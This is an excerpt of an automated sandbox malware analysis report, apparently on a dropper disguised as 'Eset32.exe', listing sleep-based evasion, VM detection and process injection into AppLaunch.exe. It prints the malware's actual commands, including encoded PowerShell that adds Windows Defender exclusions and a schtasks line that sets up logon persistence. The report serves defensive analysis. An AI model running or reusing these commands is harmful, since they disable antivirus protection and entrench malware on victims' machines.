            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Windows\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Windows\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Windows\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Windows\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Windows\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Windows\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Windows\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\AppData\Roaming\12.exe TID: 5320Thread sleep count: 72 > 30
            Source: C:\Users\user\AppData\Roaming\12.exe TID: 5320Thread sleep time: -72000s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6780Thread sleep count: 6356 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6780Thread sleep count: 2496 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6808Thread sleep time: -5534023222112862s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6452Thread sleep count: 4225 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6452Thread sleep count: 442 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6172Thread sleep time: -2767011611056431s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5632Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Roaming\Windows\System.exe TID: 5936Thread sleep count: 75 > 30
            Source: C:\Users\user\AppData\Roaming\Windows\System.exe TID: 5936Thread sleep time: -75000s >= -30000s
            Source: C:\Users\user\AppData\Roaming\Windows\System.exe TID: 2804Thread sleep count: 56 > 30
            Source: C:\Users\user\AppData\Roaming\Windows\System.exe TID: 2804Thread sleep time: -56000s >= -30000s
            Source: C:\Users\user\AppData\Roaming\Windows\System.exe TID: 4456Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4828Thread sleep count: 6186 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4828Thread sleep count: 391 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5204Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6776Thread sleep count: 4883 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6776Thread sleep count: 960 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6340Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6768Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6068Thread sleep count: 4198 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5236Thread sleep count: 686 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6636Thread sleep time: -5534023222112862s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6968Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\AppData\Roaming\Windows\System.exeLast function: Thread delayed
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\AppData\Roaming\Windows\System.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6356
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2496
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4225
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 442
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6186
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 391
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4883
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 960
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4198
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 686
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\12.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\Eset32.exe Code function: 0_2_0040646B FindFirstFileA,FindClose, 0_2_0040646B
Source: C:\Users\user\Desktop\Eset32.exe Code function: 0_2_004027A1 FindFirstFileA, 0_2_004027A1
Source: C:\Users\user\Desktop\Eset32.exe Code function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,SHELL32_IconCache_DoneExtractingIcons,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 0_2_004058BF
Source: C:\Users\user\Desktop\Eset32.exe API call chain: ExitProcess graph end node graph_0-3273
Source: AppLaunch.exe, 00000006.00000002.707285264.0000000004E55000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Win32_VideoController(Standard display types)VMware2M_HP1AAWin32_VideoController62BPM7R8VideoController120060621000000.000000-000.8107733display.infMSBDA27EW32_9PCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsBZC63ZLH
Source: AppLaunch.exe, 00000006.00000002.707285264.0000000004E55000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware
Source: AppLaunch.exe, 00000006.00000002.707420720.0000000004EC9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\AppData\Roaming\12.exe Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\Windows\System.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\12.exe Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Roaming\1.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000
Source: C:\Users\user\AppData\Roaming\1.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 4A88008
Source: 4.3.1.exe.2610000.0.unpack, u0003u2006.cs Reference to suspicious API methods: ('\\x02', 'LoadLibrary@kernel32.dll'), ('\\x02', 'GetProcAddress@kernel32.dll')
Source: 6.2.AppLaunch.exe.400000.0.unpack, u0003u2006.cs Reference to suspicious API methods: ('\\x02', 'LoadLibrary@kernel32.dll'), ('\\x02', 'GetProcAddress@kernel32.dll')
Source: sihost64.exe.26.dr, hGyH41UKf7PVMXME4b/HhVNFb05swtoHa1jYm.cs Reference to suspicious API methods: ('r9AVsVBWr', 'GetProcAddress@kernel32'), ('X0UhT8pIC', 'LoadLibrary@kernel32')
Source: C:\Windows\System32\cmd.exe Process created: Base64 decoded Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force
Source: C:\Windows\System32\cmd.exe Process created: Base64 decoded Add-MpPreference -ExclusionExtension @('exe','dll') -Force
Source: C:\Users\user\AppData\Roaming\1.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Roaming\1.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\12.exe Process created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
Source: C:\Users\user\AppData\Roaming\Windows\System.exe Process created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
Source: C:\Users\user\AppData\Roaming\12.exe Process created: C:\Windows\System32\cmd.exe cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "System" /tr "C:\Users\user\AppData\Roaming\Windows\System.exe
Source: C:\Users\user\AppData\Roaming\12.exe Process created: C:\Windows\System32\cmd.exe cmd" cmd /c "C:\Users\user\AppData\Roaming\Windows\System.exe
Source: C:\Users\user\AppData\Roaming\1.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "System" /tr "C:\Users\user\AppData\Roaming\Windows\System.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Roaming\Windows\System.exe C:\Users\user\AppData\Roaming\Windows\System.exe
Source: C:\Users\user\AppData\Roaming\Windows\System.exe Process created: C:\Users\user\AppData\Roaming\Windows\Telemetry\sihost64.exe "C:\Users\user\AppData\Roaming\Windows\Telemetry\sihost64.exe"
Source: C:\Users\user\AppData\Roaming\12.exe Queries volume information: C:\Users\user\AppData\Roaming\12.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\12.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
